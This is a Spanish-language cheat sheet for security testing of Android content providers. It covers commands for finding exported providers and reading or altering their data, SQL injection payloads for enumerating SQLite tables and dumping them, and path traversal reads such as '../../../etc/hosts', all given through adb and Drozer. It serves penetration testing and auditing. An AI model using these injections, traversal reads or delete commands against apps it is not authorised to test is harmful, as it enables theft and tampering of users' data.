# Content providers

## Búsqueda de content providers con exportación habilitada

```sh
# AndroidManifest.xml
## explícitamente
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implícitamente
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported=\"true\""

# Drozer
run app.provider.info -a <app-package-name>
```

## Obtener URIs de content providers

```sh
# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>
```

## Interacción general con content providers

### Android Debug Bridge (adb) <a href="#interaccion-general-con-content-providers-adb" id="interaccion-general-con-content-providers-adb"></a>

```sh
# General
adb shell content <command> --uri <uri> <parameters>

# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"

# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>

# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>

# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>

# Lectura de archivo
adb shell content read --uri <uri>/<file>

# Descarga de archivo 
adb shell content read --uri <uri>/<file> > <file>
```

### Drozer <a href="#interaccion-general-con-content-providers-drozer" id="interaccion-general-con-content-providers-drozer"></a>

```sh
# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'

# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>

# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'

# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>

# Lectura de archivo
run app.provider.read <uri>/<file>

# Descarga de archivo
run app.provider.download <uri>/<file> .
```

## SQL injection (SQLi)

Identificación de SQLi.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"

# Drozer 
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"
```

Enumeración de tablas.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"

# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"
```

Obtención de datos de una tabla.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"

# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"
```

## Path traversal

Identificación de path traversal.

```sh
# Drozer
run scanner.provider.traversal -a <app-package-name>
```

Lectura de archivo.

```sh
# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts

# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hosts
```